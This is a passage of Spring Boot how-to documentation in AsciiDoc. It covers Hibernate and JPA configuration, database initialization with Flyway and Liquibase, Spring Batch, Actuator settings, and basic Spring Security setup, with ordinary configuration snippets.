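\n\nFor instance, a minimal sketch of such a customizer, assuming you want to set Hibernate's batch size programmatically (the bean method name is illustrative):\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic HibernatePropertiesCustomizer hibernateBatchSizeCustomizer() {\n\t\t\/\/ Runs before the EntityManagerFactory is created; the key must match\n\t\t\/\/ Hibernate's expected name exactly (no relaxed binding)\n\t\treturn (properties) -> properties.put(\"hibernate.jdbc.batch_size\", \"25\");\n\t}\n----\n\n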
\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nHibernate uses {hibernate-docs}#naming[two different naming strategies] to map names from the object model to the corresponding database names.\nThe fully qualified class name of the physical and the implicit strategy implementations can be configured by setting the `spring.jpa.hibernate.naming.physical-strategy` and `spring.jpa.hibernate.naming.implicit-strategy` properties, respectively.\nAlternatively, if `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the application context, Hibernate will be automatically configured to use them.\n\nBy default, Spring Boot configures the physical naming strategy with `SpringPhysicalNamingStrategy`.\nThis implementation provides the same table structure as Hibernate 4: all dots are replaced by underscores and camel casing is replaced by underscores as well.\nBy default, all table names are generated in lower case, but it is possible to override that flag if your schema requires it.\n\nFor example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.\n\nIf you prefer to use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\nAlternatively, you can configure the following bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic PhysicalNamingStrategy physicalNamingStrategy() {\n\t\treturn new PhysicalNamingStrategyStandardImpl();\n\t}\n----\n\nSee {spring-boot-autoconfigure-module-code}\/orm\/jpa\/HibernateJpaAutoConfiguration.java[`HibernateJpaAutoConfiguration`] and {spring-boot-autoconfigure-module-code}\/orm\/jpa\/JpaBaseConfiguration.java[`JpaBaseConfiguration`] for more details.\n\n\n\n[[howto-configure-hibernate-second-level-caching]]\n=== Configure Hibernate Second-Level Caching\nHibernate {hibernate-docs}#caching[second-level cache] can be configured for a range of cache providers.\nRather than configuring Hibernate to look up the cache provider again, it is better to provide the one that is available in the context whenever possible.\n\nIf you are using JCache, this is pretty easy.\nFirst, make sure that `org.hibernate:hibernate-jcache` is available on the classpath.\nThen, add a `HibernatePropertiesCustomizer` bean as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jpa\/HibernateSecondLevelCacheExample.java[tag=configuration]\n----\n\nThis customizer will configure Hibernate to use the same `CacheManager` as the one that the application uses.\nIt is also possible to use separate `CacheManager` instances.\nFor details, refer to {hibernate-docs}#caching-provider-jcache[the Hibernate user guide].\n\n\n\n[[howto-use-dependency-injection-hibernate-components]]\n=== Use Dependency Injection in Hibernate Components\nBy default, Spring Boot registers a `BeanContainer` implementation that uses the `BeanFactory` so that converters and entity listeners can use regular dependency injection.\n\nYou can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer` that removes or changes the `hibernate.resource.beans.container` property.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a Custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add a `@Bean` named '`entityManagerFactory`'.\nSpring Boot auto-configuration switches off its entity manager in the presence of a bean of that type.
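\n\nThe following sketch shows the general shape of such a bean, assuming the auto-configured `EntityManagerFactoryBuilder` and a single `DataSource`; the `com.example.domain` package is illustrative:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean entityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder, DataSource dataSource) {\n\t\t\/\/ Taking over this bean means taking over its configuration as well\n\t\treturn builder\n\t\t\t\t.dataSource(dataSource)\n\t\t\t\t.packages(\"com.example.domain\")\n\t\t\t\t.build();\n\t}\n----\n\n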
\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you need to define a new one.\nOtherwise, the presence of the second bean of that type switches off the default.\nTo make it easy to do, you can use the convenient `EntityManagerFactoryBuilder` provided by Spring Boot.\nAlternatively, you can use the `LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nNOTE: When you create a bean for `LocalContainerEntityManagerFactoryBean` yourself, any customization that was applied during the creation of the auto-configured `LocalContainerEntityManagerFactoryBean` is lost.\nFor example, in case of Hibernate, any properties under the `spring.jpa.hibernate` prefix will not be automatically applied to your `LocalContainerEntityManagerFactoryBean`.\nIf you were relying on these properties for configuring things like the naming strategy or the DDL mode, you will need to explicitly configure that when creating the `LocalContainerEntityManagerFactoryBean` bean.\nOn the other hand, properties that get applied to the auto-configured `EntityManagerFactoryBuilder`, which are specified via `spring.jpa.properties`, will automatically be applied, provided you use the auto-configured `EntityManagerFactoryBuilder` to build the `LocalContainerEntityManagerFactoryBean` bean.\n\nThe configuration above almost works on its own.\nTo complete the picture, you need to configure `TransactionManagers` for the two `EntityManagers` as well.\nIf you mark one of them as `@Primary`, it can be picked up by the default `JpaTransactionManager` in Spring Boot.\nThe other would have to be explicitly injected into a new instance.\nAlternatively, you might be able to use a JTA transaction manager that spans both.\n\nIf you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional persistence.xml File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default.\nIf you prefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of type `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the persistence unit name there.\n\nSee {spring-boot-autoconfigure-module-code}\/orm\/jpa\/JpaBaseConfiguration.java[`JpaBaseConfiguration`] for the default settings.
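\n\nA minimal sketch, assuming a persistence unit named `manually-configured` is declared in your `persistence.xml` (the unit name is illustrative):\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic LocalEntityManagerFactoryBean entityManagerFactory() {\n\t\tLocalEntityManagerFactoryBean factoryBean = new LocalEntityManagerFactoryBean();\n\t\t\/\/ Must match a persistence unit declared in META-INF\/persistence.xml\n\t\tfactoryBean.setPersistenceUnitName(\"manually-configured\");\n\t\treturn factoryBean;\n\t}\n----\n\n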
\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\nSpring Data JPA and Spring Data Mongo can both automatically create `Repository` implementations for you.\nIf they are both present on the classpath, you might have to do some extra configuration to tell Spring Boot which repositories to create.\nThe most explicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and `+@EnableMongoRepositories+` annotations and provide the location of your `Repository` interfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and `+spring.data.*.repositories.type+`) that you can use to switch the auto-configured repositories on and off in external configuration.\nDoing so is useful if, for instance, you want to switch off the Mongo repositories and still use the auto-configured `MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data repository types (Elasticsearch, Solr, and others).\nTo work with them, change the names of the annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a web application.\nSpring Boot provides properties in the `spring.data.web` namespace for customizing its configuration.\nNote that if you are using Spring Data REST, you must use the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace) that customize the {spring-data-rest-api}\/core\/config\/RepositoryRestConfiguration.html[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a {spring-data-rest-api}\/webmvc\/config\/RepositoryRestConfigurer.html[`RepositoryRestConfigurer`] bean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs after the one Spring Boot uses internally.\nIf you need to specify an order, make sure it is higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure that the component is initialized before JPA.\nWhen the component is auto-configured, Spring Boot takes care of this for you.\nFor example, when Flyway is auto-configured, Hibernate is configured to depend upon Flyway so that Flyway has a chance to initialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an `EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up the necessary dependencies.\nFor example, if you use Hibernate Search with Elasticsearch as its index manager, any `EntityManagerFactory` beans must be configured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own `DSLContext` for each one.\nRefer to {spring-boot-autoconfigure-module-code}\/jooq\/JooqAutoConfiguration.java[JooqAutoConfiguration] for more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be reused to provide similar features to what the auto-configuration does with a single `DataSource`.
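\n\nA minimal sketch of wiring one `DSLContext` per `DataSource` (the qualifier name and the SQL dialect are illustrative; a second, analogous bean would be needed for the other data source):\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DSLContext firstDslContext(@Qualifier(\"firstDataSource\") DataSource firstDataSource) {\n\t\t\/\/ One DSLContext per DataSource\n\t\treturn DSL.using(firstDataSource, SQLDialect.MYSQL);\n\t}\n----\n\n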
\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\nIt is recommended to use a single mechanism for schema generation.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the database.\nThis is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor independent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the behavior in a more fine-grained way.\n This feature is described in more detail later in this guide.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly, and the standard Hibernate property values are `none`, `validate`, `update`, `create`, and `create-drop`.\nSpring Boot chooses a default value for you based on whether it thinks your database is embedded.\nIt defaults to `create-drop` if no schema manager has been detected, or `none` in all other cases.\nAn embedded database is detected by looking at the `Connection` type.\n`hsqldb`, `h2`, and `derby` are embedded, and others are not.\nBe careful when switching from in-memory to a '`real`' database that you do not make assumptions about the existence of the tables and data in the new platform.\nYou either have to set `ddl-auto` explicitly or use one of the other mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger.\nThis is done for you automatically if you enable the <<spring-boot-features.adoc#boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on startup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property is set to `create` or `create-drop`).\nThis can be useful for demos and for testing if you are careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database using basic SQL scripts\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and initialize it (DML scripts).\nIt loads SQL from the standard root classpath locations: `schema.sql` and `data.sql`, respectively.\nIn addition, Spring Boot processes the `schema-$\\{platform}.sql` and `data-$\\{platform}.sql` files (if present), where `platform` is the value of `spring.datasource.platform`.\nThis allows you to switch to database-specific scripts if necessary.\nFor example, you might choose to set it to the vendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).
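\n\nFor example, the following setting would cause `schema-postgresql.sql` and `data-postgresql.sql` to be processed in addition to the generic scripts:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.platform=postgresql\n----\n\n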
[NOTE]\n====\nWhen only basic SQL scripts are used, Spring Boot automatically creates the schema of an embedded `DataSource`.\nThis behavior can be customized by using the configprop:spring.datasource.initialization-mode[] property.\nFor instance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n\nIn a JPA-based app, you can choose to let Hibernate create the schema or use `schema.sql`, but you cannot do both.\nMake sure to disable `spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.ddl-auto=none\n----\n\nIf you are using a <<spring-boot-features.adoc#howto-use-a-higher-level-database-migration-tool,Higher-level Database Migration Tool>>, like Flyway or Liquibase, you cannot use basic SQL scripts to create and initialize the schema.\nIn this situation, if `schema.sql` and `data.sql` are present, they will be ignored.\nIt is not possible to use a database migration tool to manage schema creation and a basic SQL script to initialize it.\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer.\nThis means that, if the scripts cause exceptions, the application fails to start.\nYou can tune that behavior by setting `spring.datasource.continue-on-error`.\n\n\n\n[[howto-initialize-a-database-using-r2dbc]]\n=== Initialize a Database Using R2DBC\nIf you are using R2DBC, the regular `DataSource` auto-configuration backs off, so none of the options described above can be used.\n\nIf you are using Spring Data R2DBC, you can initialize the database on startup using simple SQL scripts as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/r2dbc\/R2dbcDatabaseInitializationExample.java[tag=configuration]\n----\n\nAlternatively, you can configure either <<howto-execute-flyway-database-migrations-on-startup,Flyway>> or <<howto-execute-liquibase-database-migrations-on-startup,Liquibase>> to set up a `DataSource` for you for the duration of the migration.\nBoth these libraries offer properties to set the `url`, `username` and `password` of the database to migrate.\n\nNOTE: When choosing this option, `org.springframework:spring-jdbc` is still a required dependency.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most popular database platforms.\nSpring Boot can detect your database type and execute those scripts on startup.\nIf you use an embedded database, this happens by default.\nYou can also enable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting `spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two higher-level migration tools: https:\/\/flywaydb.org\/[Flyway] and https:\/\/www.liquibase.org\/[Liquibase].\n\n\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add `org.flywaydb:flyway-core` to your classpath.\n\nTypically, migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an underscore-separated version, such as '`1`' or '`2_1`').\nBy default, they are in a directory called `classpath:db\/migration`, but 
you can modify that location by setting `spring.flyway.locations`.\nThis is a comma-separated list of one or more `classpath:` or `filesystem:` locations.\nFor example, the following configuration would search for scripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `\\{vendor}` placeholder to use vendor-specific scripts.\nAssume the following:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the directory to use according to the type of the database (such as `db\/migration\/mysql` for MySQL).\nThe list of supported databases is available in {spring-boot-module-code}\/jdbc\/DatabaseDriver.java[`DatabaseDriver`].\n\nMigrations can also be written in Java (see the sketch at the end of this section).\nFlyway will be auto-configured with any beans that implement `JavaMigration`.\n\n{spring-boot-autoconfigure-module-code}\/flyway\/FlywayProperties.java[`FlywayProperties`] provides most of Flyway's settings and a small set of additional properties that can be used to disable the migrations or switch off the location checking.\nIf you need more control over the configuration, consider registering a `FlywayConfigurationCustomizer` bean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration.\nIf you would like more control, provide a `@Bean` that implements {spring-boot-autoconfigure-module-code}\/flyway\/FlywayMigrationStrategy.java[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration` directory.\nTo use Java-based callbacks, create one or more beans that implement `Callback`.\nAny such beans are automatically registered with `Flyway`.\nThey can be ordered by using `@Order` or by implementing `Ordered`.\nBeans that implement the deprecated `FlywayCallback` interface can also be detected; however, they cannot be used alongside `Callback` beans.\n\nBy default, Flyway autowires the (`@Primary`) `DataSource` in your context and uses that for migrations.\nIf you want to use a different `DataSource`, you can create one and mark its `@Bean` as `@FlywayDataSource`.\nIf you do so and want two data sources, remember to create another one and mark it as `@Primary`.\nAlternatively, you can use Flyway's native `DataSource` by setting `spring.flyway.[url,user,password]` in external properties.\nSetting either `spring.flyway.url` or `spring.flyway.user` is sufficient to cause Flyway to use its own `DataSource`.\nIf any of the three properties has not been set, the value of its equivalent `spring.datasource` property will be used.\n\nYou can also use Flyway to provide data for specific scenarios.\nFor example, you can place test-specific migrations in `src\/test\/resources` and they are run only when your application starts for testing.\nAlso, you can use profile-specific configuration to customize `spring.flyway.locations` so that certain migrations run only when a particular profile is active.\nFor example, in `application-dev.properties`, you might specify the following setting:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:\/db\/migration,classpath:\/dev\/db\/migration\n----\n\nWith that setup, migrations in `dev\/db\/migration` run only when the `dev` profile is active.
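\n\nAs mentioned above, migrations can also be written in Java.\nA minimal sketch of such a migration, assuming Flyway's `BaseJavaMigration` base class (the class name encodes the version; the SQL is illustrative):\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class V2__InsertDefaults extends BaseJavaMigration {\n\n\t\t@Override\n\t\tpublic void migrate(Context context) throws Exception {\n\t\t\ttry (Statement statement = context.getConnection().createStatement()) {\n\t\t\t\tstatement.execute(\"INSERT INTO defaults (name) VALUES ('value')\");\n\t\t\t}\n\t\t}\n\n\t}\n----\n\n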
\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase Database Migrations on Startup\nTo automatically run Liquibase database migrations on startup, add `org.liquibase:liquibase-core` to your classpath.\n\n[NOTE]\n====\nWhen you add `org.liquibase:liquibase-core` to your classpath, database migrations run by default both during application startup and before your tests run.\nThis behavior can be customized by using the configprop:spring.liquibase.enabled[] property, setting different values in the `main` and `test` configurations.\nIt is not possible to use two different ways to initialize the database (for example, Liquibase for application startup and JPA for test runs).\n====\n\nBy default, the master change log is read from `db\/changelog\/db.changelog-master.yaml`, but you can change the location by setting `spring.liquibase.change-log`.\nIn addition to YAML, Liquibase also supports JSON, XML, and SQL change log formats.\n\nBy default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses that for migrations.\nIf you need to use a different `DataSource`, you can create one and mark its `@Bean` as `@LiquibaseDataSource`.\nIf you do so and you want two data sources, remember to create another one and mark it as `@Primary`.\nAlternatively, you can use Liquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in external properties.\nSetting either `spring.liquibase.url` or `spring.liquibase.user` is sufficient to cause Liquibase to use its own `DataSource`.\nIf any of the three properties has not been set, the value of its equivalent `spring.datasource` property will be used.\n\nSee {spring-boot-autoconfigure-module-code}\/liquibase\/LiquibaseProperties.java[`LiquibaseProperties`] for details about available settings such as contexts, the default schema, and others.\n\n\n\n[[howto-messaging]]\n== Messaging\nSpring Boot offers a number of starters that include messaging.\nThis section answers questions that arise from using messaging with Spring Boot.\n\n\n\n[[howto-jms-disable-transaction]]\n=== Disable Transacted JMS Session\nIf your JMS broker does not support transacted sessions, you have to disable the support of transactions altogether.\nIf you create your own `JmsListenerContainerFactory`, there is nothing to do, since, by default, it cannot be transacted.\nIf you want to use the `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you can disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any other factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\nA number of questions often arise when people use Spring Batch from within a Spring Boot application.\nThis section addresses those questions.\n\n\n\n[[howto-spring-batch-specifying-a-data-source]]\n=== 
Specifying a Batch Data Source\nBy default, batch applications require a `DataSource` to store job details.\nSpring Batch expects a single `DataSource` for this.\nTo have it use a `DataSource` other than the application\u2019s main `DataSource`, declare a `DataSource` bean, annotating its `@Bean` method with `@BatchDataSource`.\nIf you do so and want two data sources, remember to mark the other one `@Primary`.\nTo take greater control, implement `BatchConfigurer`.\nSee {spring-batch-api}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The Javadoc of `@EnableBatchProcessing`] for more details.\n\nFor more info about Spring Batch, see the {spring-batch}[Spring Batch project page].
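\n\nA minimal sketch of the `@BatchDataSource` declaration described above, assuming an embedded H2 database is used for the job metadata (the URL is illustrative):\n\n[source,java,indent=0]\n----\n\t@Bean\n\t@BatchDataSource\n\tpublic DataSource batchDataSource() {\n\t\t\/\/ Dedicated store for Spring Batch metadata; the main DataSource\n\t\t\/\/ (marked @Primary elsewhere) remains untouched\n\t\treturn DataSourceBuilder.create()\n\t\t\t\t.url(\"jdbc:h2:mem:batchdb\")\n\t\t\t\t.build();\n\t}\n----\n\n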
\n\n[[howto-spring-batch-running-jobs-on-startup]]\n=== Running Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing` to one of your `@Configuration` classes.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see {spring-boot-autoconfigure-module-code}\/batch\/JobLauncherApplicationRunner.java[`JobLauncherApplicationRunner`] for details).\nYou can narrow down to a specific job or jobs by specifying `spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\nSee {spring-boot-autoconfigure-module-code}\/batch\/BatchAutoConfiguration.java[BatchAutoConfiguration] and {spring-batch-api}\/core\/configuration\/annotation\/EnableBatchProcessing.html[@EnableBatchProcessing] for more details.\n\n\n\n[[howto-spring-batch-running-command-line]]\n=== Running from the Command Line\nSpring Boot converts any command line argument starting with `--` to a property to add to the `Environment`; see <<spring-boot-features.adoc#boot-features-external-config-command-line-args,accessing command line properties>>.\nThis should not be used to pass arguments to batch jobs.\nTo specify batch arguments on the command line, use the regular format (that is, without `--`), as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -jar myapp.jar someParameter=someValue anotherParameter=anotherValue\n----\n\nIf you specify a property of the `Environment` on the command line, it is ignored by the job.\nConsider the following command:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -jar myapp.jar --server.port=7070 someParameter=someValue\n----\n\nThis provides only one argument to the batch job: `someParameter=someValue`.\n\n\n\n[[howto-spring-batch-storing-job-repository]]\n=== Storing the Job Repository\nSpring Batch requires a data store for the `Job` repository.\nIf you use Spring Boot, you must use an actual database.\nNote that it can be an in-memory database; see {spring-batch-docs}job.html#configuringJobRepository[Configuring a Job Repository].\n\n\n\n[[howto-actuator]]\n== Actuator\nSpring Boot includes the Spring Boot Actuator.\nThis section answers questions that often arise from its use.\n\n\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP port.\nTo make the application listen on a different port, set the external property: configprop:management.server.port[].\nTo listen on a completely different network address (such as when you have an internal network for management and an external one for user applications), you can also set `management.server.address` to a valid IP address to which the server is able to bind.
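\n\nFor instance, the following settings move the actuator endpoints to port 8081 and bind them to a management-only interface (the values are illustrative):\n\n[source,properties,indent=0]\n----\n\tmanagement.server.port=8081\n\tmanagement.server.address=127.0.0.1\n----\n\n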
For more detail, see the {spring-boot-actuator-autoconfigure-module-code}\/web\/server\/ManagementServerProperties.java[`ManagementServerProperties`] source code and \"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`\" in the \"`Production-ready features`\" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if you encounter a server error (machine clients consuming JSON and other media types should see a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using.\nNote that Spring Boot still tries to resolve the error view, so you should probably add your own error page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you use.\nFor example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftlh` template.\nIn general, you need a `View` that resolves with a name of `error` or a `@Controller` that handles the `\/error` path.\nUnless you replaced some of the default configuration, you should find a `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would be a simple way of doing that.\nSee {spring-boot-autoconfigure-module-code}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.java[`ErrorMvcAutoConfiguration`] for more options.\n\nSee also the section on \"`<<spring-boot-features.adoc#boot-features-error-handling, Error Handling>>`\" for details of how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n[[howto-sanitize-sensitive-values]]\n=== Sanitize Sensitive Values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive, so keys matching a certain pattern are sanitized by default (i.e. their values are replaced by `+******+`).\n\nThe patterns to use can be customized using the `management.endpoint.env.keys-to-sanitize` and `management.endpoint.configprops.keys-to-sanitize` properties, respectively.\n\nSpring Boot uses sensible defaults for such keys: any key ending with the word \"password\", \"secret\", \"key\", \"token\", \"vcap_services\", \"sun.java.command\", \"uri\", \"uris\", \"address\" or \"addresses\" is sanitized.\nAdditionally, any key that holds the word `credentials` as part of the key is sanitized (configured as a regular expression, i.e. `+.*credentials.*+`).\n\nIf any of the keys to sanitize are in URI format (i.e. `<scheme>:\/\/<username>:<password>@<host>:<port>\/`), only the password part is sanitized.\n\n\n\n[[howto-map-health-indicators-to-metrics]]\n=== Map Health Indicators to Micrometer Metrics\nSpring Boot health indicators return a `Status` type to indicate the overall system health.\nIf you want to monitor or alert on levels of health for a particular application, you can export these statuses as metrics via Micrometer.\nBy default, the status codes \"`UP`\", \"`DOWN`\", \"`OUT_OF_SERVICE`\" and \"`UNKNOWN`\" are used by Spring Boot.\nTo export these, you need to convert these statuses to a set of numbers so that they can be used with a Micrometer `Gauge`.\n\nThe following example shows one way to write such an exporter:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/actuate\/metrics\/MetricsHealthMicrometerExportExample.java[tag=configuration]\n----\n\n\n\n[[howto-security]]\n== Security\nThis section addresses questions about security when working with Spring Boot, including questions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application, it switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`, or `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not created.\nThis means you have the full feature set of Spring Security available (such as {spring-security-docs}#servlet-authentication[various authentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.
